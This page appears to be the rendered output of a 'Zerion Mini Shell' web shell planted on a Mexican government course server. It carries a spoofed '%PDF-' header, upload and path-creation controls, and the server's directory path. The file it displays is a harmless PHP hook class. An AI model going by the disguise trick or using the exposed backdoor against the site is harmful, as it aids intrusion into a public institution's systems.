%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/tjamichg/cursos.tjamich.gob.mx/main/inc/lib/hook/
Upload File :
Create Path :
Current File : //home/tjamichg/cursos.tjamich.gob.mx/main/inc/lib/hook/HookLearningPathItemViewed.php

<?php

/* For licensing terms, see /license.txt */

/**
 * Class HookLearningPathItemViewed.
 */
class HookLearningPathItemViewed extends HookEvent implements HookLearningPathItemViewedEventInterface
{
    /**
     * HookLearningPathItemViewed constructor.
     *
     * @throws \Exception
     */
    protected function __construct()
    {
        parent::__construct('HookLearningPathItemViewed');
    }

    /**
     * {@inheritdoc}
     */
    public function notifyLearningPathItemViewed()
    {
        /** @var \HookLearningPathItemViewedObserverInterface $observer */
        foreach ($this->observers as $observer) {
            $observer->hookLearningPathItemViewed($this);
        }
    }
}

Zerion Mini Shell 1.0